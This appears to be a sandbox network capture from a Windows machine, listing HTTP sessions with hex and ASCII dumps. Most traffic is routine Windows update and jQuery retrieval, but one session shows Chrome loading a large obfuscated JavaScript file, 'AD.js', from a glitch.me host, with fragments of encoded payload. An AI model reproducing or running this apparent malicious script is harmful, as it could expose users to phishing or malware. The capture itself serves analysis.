                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:06 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: identity
                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                      Host: fs.microsoft.com
                                                                                                                      2024-12-03 07:54:06 UTC478INHTTP/1.1 200 OK
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Server: Kestrel
                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                      X-OSID: 2
                                                                                                                      X-CID: 2
                                                                                                                      X-CCC: GB
                                                                                                                      Cache-Control: public, max-age=41554
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:06 GMT
                                                                                                                      Connection: close
                                                                                                                      X-CID: 2


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.4497394.245.163.56443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:08 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=NhOYamuYEUBDEwV&MD=h57hdrmx HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                      2024-12-03 07:54:08 UTC560INHTTP/1.1 200 OK
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Expires: -1
                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                      MS-CorrelationId: 1ea21083-2165-47a6-b33a-dd4de180982d
                                                                                                                      MS-RequestId: 37daac61-be19-4602-98e4-e8148e94ea32
                                                                                                                      MS-CV: ZNYqGXyNMkyFb2fZ.0
                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:08 GMT
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 24490
                                                                                                                      2024-12-03 07:54:08 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                      2024-12-03 07:54:08 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.44974323.218.208.109443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:08 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: identity
                                                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                      Range: bytes=0-2147483646
                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                      Host: fs.microsoft.com
                                                                                                                      2024-12-03 07:54:08 UTC535INHTTP/1.1 200 OK
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                      ApiVersion: Distribute 1.1
                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                      X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                      Cache-Control: public, max-age=101476
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:08 GMT
                                                                                                                      Content-Length: 55
                                                                                                                      Connection: close
                                                                                                                      X-CID: 2
                                                                                                                      2024-12-03 07:54:08 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.44975423.21.241.834434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:25 UTC590OUTGET /AD.js HTTP/1.1
                                                                                                                      Host: branched-versed-session.glitch.me
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:54:25 UTC522INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:25 GMT
                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                      Content-Length: 1181731
                                                                                                                      Connection: close
                                                                                                                      x-amz-id-2: 8IIDcXQel31twwL0L5/mrtHly4RkDkZztm1AE9GuLWmijFVIJyd0lt+kmbAd4dQ2ayvQf2d7J30=
                                                                                                                      x-amz-request-id: PP8FVN6ES00R56HN
                                                                                                                      last-modified: Fri, 29 Nov 2024 03:56:43 GMT
                                                                                                                      etag: "ca978c77df03aad4547a5b311a467078"
                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                      cache-control: no-cache
                                                                                                                      x-amz-version-id: ZhuIyOI9r7HOxo7Kt0KTQ55W8rC9koYb
                                                                                                                      accept-ranges: bytes
                                                                                                                      server: AmazonS3
                                                                                                                      2024-12-03 07:54:25 UTC8427INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 38 64 66 34 32 61 2c 5f 30 78 35 33 66 64 37 34 29 7b 76 61 72 20 5f 30 78 34 62 30 36 62 62 3d 5f 30 78 38 64 66 34 32 61 28 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 39 32 63 63 64 28 5f 30 78 35 31 39 61 64 62 2c 5f 30 78 31 62 61 34 31 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 31 39 38 28 5f 30 78 35 31 39 61 64 62 2d 20 2d 30 78 32 61 38 2c 5f 30 78 31 62 61 34 31 37 29 3b 7d 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 32 32 63 63 66 38 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 39 32 63 63 64 28 2d 30 78 31 33 34 2c 2d 30 78 31 33 32 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 39 32 63 63 64 28 2d 30 78 31 34 32 2c 2d 30 78 31 35 31 29 29 2f 30 78 32 29 2b 70 61 72
                                                                                                                      Data Ascii: (function(_0x8df42a,_0x53fd74){var _0x4b06bb=_0x8df42a();function _0x592ccd(_0x519adb,_0x1ba417){return _0x3198(_0x519adb- -0x2a8,_0x1ba417);}while(!![]){try{var _0x22ccf8=parseInt(_0x592ccd(-0x134,-0x132))/0x1*(parseInt(_0x592ccd(-0x142,-0x151))/0x2)+par
                                                                                                                      2024-12-03 07:54:25 UTC16384INData Raw: 46 25 34 45 25 34 33 25 36 37 25 36 46 25 34 43 25 34 34 25 34 31 25 37 37 25 34 44 25 34 34 25 34 31 25 36 33 25 34 41 25 34 34 25 36 37 25 33 38 25 34 45 25 34 34 25 34 31 25 33 34 25 34 43 25 34 34 25 34 31 25 37 37 25 34 44 25 32 46 25 33 39 25 37 33 25 34 31 25 35 31 25 37 37 25 34 35 25 34 33 25 34 31 25 36 37 25 34 39 25 34 34 25 34 31 25 37 37 25 34 44 25 34 37 25 34 31 25 37 37 25 34 44 25 34 37 25 34 34 25 34 31 25 36 37 25 34 38 25 34 33 25 34 31 25 37 37 25 34 44 25 34 34 25 34 31 25 37 37 25 34 44 25 34 34 25 34 31 25 37 37 25 34 44 25 34 34 25 34 31 25 37 37 25 34 44 25 34 34 25 34 31 25 37 37 25 34 44 25 34 34 25 34 31 25 37 37 25 34 44 25 34 34 25 34 31 25 37 37 25 34 44 25 34 34 25 34 31 25 37 37 25 34 44 25 34 34 25 34 31 25 37 37 25 34
                                                                                                                      Data Ascii: F%4E%43%67%6F%4C%44%41%77%4D%44%41%63%4A%44%67%38%4E%44%41%34%4C%44%41%77%4D%2F%39%73%41%51%77%45%43%41%67%49%44%41%77%4D%47%41%77%4D%47%44%41%67%48%43%41%77%4D%44%41%77%4D%44%41%77%4D%44%41%77%4D%44%41%77%4D%44%41%77%4D%44%41%77%4D%44%41%77%4D%44%41%77%4
                                                                                                                      2024-12-03 07:54:25 UTC9471INData Raw: 25 33 39 25 36 31 25 37 38 25 36 41 25 36 44 25 35 35 25 34 38 25 35 30 25 36 42 25 35 32 25 33 30 25 35 30 25 34 41 25 37 31 25 37 33 25 36 31 25 35 38 25 37 34 25 34 41 25 34 38 25 37 32 25 34 33 25 37 34 25 37 35 25 34 36 25 34 36 25 35 31 25 33 32 25 34 35 25 36 38 25 36 42 25 36 37 25 34 32 25 34 45 25 35 34 25 35 36 25 33 36 25 36 33 25 35 38 25 36 34 25 35 38 25 35 30 25 34 35 25 36 31 25 37 33 25 33 37 25 34 32 25 35 32 25 35 32 25 35 32 25 35 36 25 34 33 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 37 30 25 37 33 25 37 38 25 37 38 25 34 35 25 33 33 25 33 30 25 37 30 25 33 31 25 34 45 25 36 44
                                                                                                                      Data Ascii: %39%61%78%6A%6D%55%48%50%6B%52%30%50%4A%71%73%61%58%74%4A%48%72%43%74%75%46%46%51%32%45%68%6B%67%42%4E%54%56%36%63%58%64%58%50%45%61%73%37%42%52%52%52%56%43%43%69%69%69%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%70%73%78%78%45%33%30%70%31%4E%6D
                                                                                                                      2024-12-03 07:54:26 UTC16384INData Raw: 25 35 34 25 35 37 25 37 33 25 37 36 25 37 37 25 32 42 25 36 35 25 34 42 25 34 44 25 34 44 25 34 36 25 33 35 25 37 32 25 34 46 25 36 41 25 36 38 25 36 31 25 33 32 25 33 35 25 37 32 25 35 38 25 37 38 25 32 42 25 34 38 25 37 36 25 35 41 25 33 32 25 34 38 25 36 31 25 34 41 25 35 39 25 37 32 25 35 30 25 34 36 25 37 35 25 35 39 25 33 31 25 36 43 25 32 42 25 34 42 25 37 32 25 37 30 25 37 32 25 34 36 25 34 37 25 33 32 25 35 36 25 37 32 25 33 32 25 33 32 25 36 45 25 35 38 25 34 36 25 37 33 25 36 34 25 37 35 25 34 37 25 37 31 25 35 30 25 35 35 25 35 30 25 34 33 25 34 44 25 33 32 25 37 30 25 36 37 25 33 37 25 36 43 25 36 32 25 33 38 25 37 31 25 33 37 25 34 42 25 36 42 25 34 41 25 34 46 25 34 38 25 34 43 25 34 36 25 36 31 25 36 45 25 36 43 25 33 30 25 33 36 25 36 42
                                                                                                                      Data Ascii: %54%57%73%76%77%2B%65%4B%4D%4D%46%35%72%4F%6A%68%61%32%35%72%58%78%2B%48%76%5A%32%48%61%4A%59%72%50%46%75%59%31%6C%2B%4B%72%70%72%46%47%32%56%72%32%32%6E%58%46%73%64%75%47%71%50%55%50%43%4D%32%70%67%37%6C%62%38%71%37%4B%6B%4A%4F%48%4C%46%61%6E%6C%30%36%6B
                                                                                                                      2024-12-03 07:54:26 UTC9985INData Raw: 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25
                                                                                                                      Data Ascii: 69%69%69%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%
                                                                                                                      2024-12-03 07:54:26 UTC16384INData Raw: 34 25 35 31 25 33 33 25 35 33 25 37 31 25 34 33 25 33 33 25 35 37 25 36 37 25 34 34 25 33 31 25 33 37 25 35 35 25 35 30 25 34 36 25 36 42 25 36 34 25 37 33 25 34 45 25 33 32 25 33 34 25 36 34 25 34 42 25 37 32 25 33 32 25 34 38 25 36 41 25 36 35 25 34 37 25 33 34 25 36 32 25 32 46 25 35 37 25 34 34 25 33 38 25 33 36 25 33 38 25 37 32 25 37 36 25 34 45 25 35 41 25 37 35 25 37 32 25 37 35 25 37 37 25 33 33 25 34 34 25 36 34 25 33 30 25 37 41 25 35 38 25 35 30 25 35 31 25 36 35 25 34 41 25 37 32 25 37 41 25 35 34 25 33 37 25 37 37 25 32 46 25 36 35 25 36 46 25 34 31 25 32 42 25 36 38 25 34 34 25 33 34 25 37 32 25 36 38 25 35 31 25 36 33 25 37 39 25 34 43 25 32 42 25 36 34 25 35 31 25 33 33 25 35 30 25 36 41 25 34 42 25 34 32 25 34 36 25 32 42 25 32 42 25 37
                                                                                                                      Data Ascii: 4%51%33%53%71%43%33%57%67%44%31%37%55%50%46%6B%64%73%4E%32%34%64%4B%72%32%48%6A%65%47%34%62%2F%57%44%38%36%38%72%76%4E%5A%75%72%75%77%33%44%64%30%7A%58%50%51%65%4A%72%7A%54%37%77%2F%65%6F%41%2B%68%44%34%72%68%51%63%79%4C%2B%64%51%33%50%6A%4B%42%46%2B%2B%7
                                                                                                                      2024-12-03 07:54:26 UTC16384INData Raw: 25 35 38 25 36 41 25 34 45 25 37 34 25 33 38 25 36 31 25 35 30 25 34 45 25 36 38 25 32 42 25 32 46 25 35 36 25 34 46 25 32 42 25 32 42 25 34 44 25 35 34 25 35 32 25 35 30 25 36 45 25 36 34 25 35 31 25 34 32 25 33 37 25 36 46 25 36 43 25 32 46 25 34 37 25 32 46 25 37 37 25 34 34 25 34 36 25 35 34 25 34 41 25 34 45 25 35 35 25 36 41 25 35 31 25 32 46 25 36 35 25 34 36 25 36 35 25 34 38 25 35 37 25 37 36 25 37 38 25 37 41 25 33 34 25 37 38 25 37 36 25 34 45 25 35 34 25 35 37 25 36 45 25 37 38 25 36 36 25 36 31 25 32 42 25 37 35 25 35 36 25 34 31 25 36 32 25 37 36 25 33 36 25 33 30 25 34 31 25 36 35 25 33 33 25 34 41 25 36 35 25 37 31 25 37 39 25 33 35 25 37 31 25 34 46 25 35 34 25 35 36 25 35 39 25 33 34 25 37 41 25 37 39 25 35 32 25 35 38 25 34 41 25 36 31
                                                                                                                      Data Ascii: %58%6A%4E%74%38%61%50%4E%68%2B%2F%56%4F%2B%2B%4D%54%52%50%6E%64%51%42%37%6F%6C%2F%47%2F%77%44%46%54%4A%4E%55%6A%51%2F%65%46%65%48%57%76%78%7A%34%78%76%4E%54%57%6E%78%66%61%2B%75%56%41%62%76%36%30%41%65%33%4A%65%71%79%35%71%4F%54%56%59%34%7A%79%52%58%4A%61
                                                                                                                      2024-12-03 07:54:26 UTC16384INData Raw: 35 32 25 33 35 25 37 31 25 32 46 25 37 37 25 34 32 25 33 34 25 35 36 25 35 33 25 33 38 25 37 38 25 37 36 25 33 37 25 33 31 25 34 38 25 36 44 25 34 45 25 32 46 25 36 35 25 36 46 25 34 31 25 37 35 25 32 42 25 36 31 25 37 36 25 33 38 25 34 31 25 36 35 25 34 36 25 34 38 25 36 44 25 37 32 25 32 46 25 36 35 25 34 36 25 35 35 25 37 36 25 34 44 25 36 32 25 32 42 25 33 39 25 35 32 25 33 35 25 36 41 25 36 36 25 33 33 25 37 31 25 34 31 25 34 43 25 37 36 25 36 44 25 37 32 25 32 46 25 36 35 25 34 36 25 34 38 25 36 44 25 37 32 25 32 46 25 34 31 25 34 38 25 36 38 25 35 36 25 34 43 25 37 41 25 34 37 25 32 46 25 37 36 25 35 35 25 36 35 25 35 39 25 33 33 25 33 39 25 33 36 25 36 37 25 34 33 25 33 37 25 33 35 25 37 31 25 32 46 25 37 37 25 34 32 25 33 34 25 35 35 25 36 35 25
                                                                                                                      Data Ascii: 52%35%71%2F%77%42%34%56%53%38%78%76%37%31%48%6D%4E%2F%65%6F%41%75%2B%61%76%38%41%65%46%48%6D%72%2F%65%46%55%76%4D%62%2B%39%52%35%6A%66%33%71%41%4C%76%6D%72%2F%65%46%48%6D%72%2F%41%48%68%56%4C%7A%47%2F%76%55%65%59%33%39%36%67%43%37%35%71%2F%77%42%34%55%65%
                                                                                                                      2024-12-03 07:54:26 UTC16384INData Raw: 36 25 32 46 25 37 38 25 34 41 25 36 46 25 36 33 25 36 42 25 36 44 25 36 38 25 33 37 25 36 44 25 37 41 25 37 35 25 33 32 25 33 30 25 34 31 25 36 34 25 35 41 25 37 30 25 35 38 25 37 38 25 33 39 25 36 39 25 36 44 25 37 35 25 36 34 25 37 32 25 35 33 25 36 34 25 33 38 25 36 34 25 36 31 25 33 32 25 37 30 25 32 46 25 36 41 25 34 43 25 34 34 25 34 38 25 34 34 25 37 35 25 33 38 25 37 37 25 36 36 25 36 45 25 35 38 25 37 41 25 36 31 25 37 35 25 36 41 25 35 38 25 35 36 25 37 36 25 36 35 25 37 33 25 37 39 25 33 37 25 37 35 25 37 34 25 36 31 25 36 42 25 36 32 25 35 38 25 35 35 25 33 36 25 32 42 25 35 37 25 35 37 25 36 32 25 37 30 25 33 36 25 33 30 25 34 31 25 36 36 25 35 32 25 34 38 25 36 38 25 33 33 25 33 34 25 37 35 25 37 37 25 33 36 25 36 41 25 34 46 25 34 36 25 33
                                                                                                                      Data Ascii: 6%2F%78%4A%6F%63%6B%6D%68%37%6D%7A%75%32%30%41%64%5A%70%58%78%39%69%6D%75%64%72%53%64%38%64%61%32%70%2F%6A%4C%44%48%44%75%38%77%66%6E%58%7A%61%75%6A%58%56%76%65%73%79%37%75%74%61%6B%62%58%55%36%2B%57%57%62%70%36%30%41%66%52%48%68%33%34%75%77%36%6A%4F%46%3
                                                                                                                      2024-12-03 07:54:26 UTC16384INData Raw: 25 35 32 25 33 37 25 32 46 25 37 30 25 35 36 25 35 38 25 36 31 25 36 36 25 35 34 25 33 39 25 36 31 25 34 45 25 37 30 25 33 39 25 35 30 25 33 31 25 36 46 25 34 31 25 37 34 25 36 36 25 36 31 25 35 30 25 36 36 25 33 39 25 34 42 25 35 30 25 37 34 25 34 38 25 37 36 25 32 42 25 36 43 25 35 36 25 36 34 25 37 30 25 33 39 25 35 30 25 33 31 25 36 46 25 33 32 25 36 45 25 33 30 25 32 46 25 35 37 25 36 37 25 34 33 25 33 31 25 33 39 25 36 46 25 33 39 25 32 46 25 33 30 25 36 46 25 32 42 25 33 30 25 36 35 25 32 46 25 33 36 25 35 36 25 35 36 25 33 32 25 36 45 25 33 30 25 32 46 25 35 37 25 36 41 25 36 31 25 36 36 25 35 34 25 33 39 25 36 31 25 34 31 25 34 43 25 35 38 25 33 32 25 36 41 25 33 33 25 32 46 25 35 33 25 36 41 25 33 37 25 35 32 25 33 37 25 32 46 25 37 30 25 35 36
                                                                                                                      Data Ascii: %52%37%2F%70%56%58%61%66%54%39%61%4E%70%39%50%31%6F%41%74%66%61%50%66%39%4B%50%74%48%76%2B%6C%56%64%70%39%50%31%6F%32%6E%30%2F%57%67%43%31%39%6F%39%2F%30%6F%2B%30%65%2F%36%56%56%32%6E%30%2F%57%6A%61%66%54%39%61%41%4C%58%32%6A%33%2F%53%6A%37%52%37%2F%70%56


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.449759151.101.130.1374434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:29 UTC602OUTGET /jquery-3.3.1.slim.min.js HTTP/1.1
                                                                                                                      Host: code.jquery.com
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      Origin: null
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:54:29 UTC612INHTTP/1.1 200 OK
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 69917
                                                                                                                      Server: nginx
                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                      ETag: "28feccc0-1111d"
                                                                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Age: 2327788
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:29 GMT
                                                                                                                      X-Served-By: cache-lga21982-LGA, cache-ewr-kewr1740050-EWR
                                                                                                                      X-Cache: HIT, HIT
                                                                                                                      X-Cache-Hits: 246, 0
                                                                                                                      X-Timer: S1733212469.431981,VS0,VE1
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      2024-12-03 07:54:29 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                                                                      Data Ascii: /*! jQuery v3.3.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                                                                      2024-12-03 07:54:29 UTC1378INData Raw: 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 77 2e 66 6e 2e 69 6e 69 74 28 65 2c 74 29 7d 2c 43 3d 2f 5e 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 7c 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 24 2f 67 3b 77 2e 66 6e 3d 77 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 6a 71 75 65 72 79 3a 78 2c 63 6f 6e 73 74 72 75 63 74 6f 72 3a 77 2c 6c 65 6e 67 74 68 3a 30 2c 74 6f 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 6f 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28
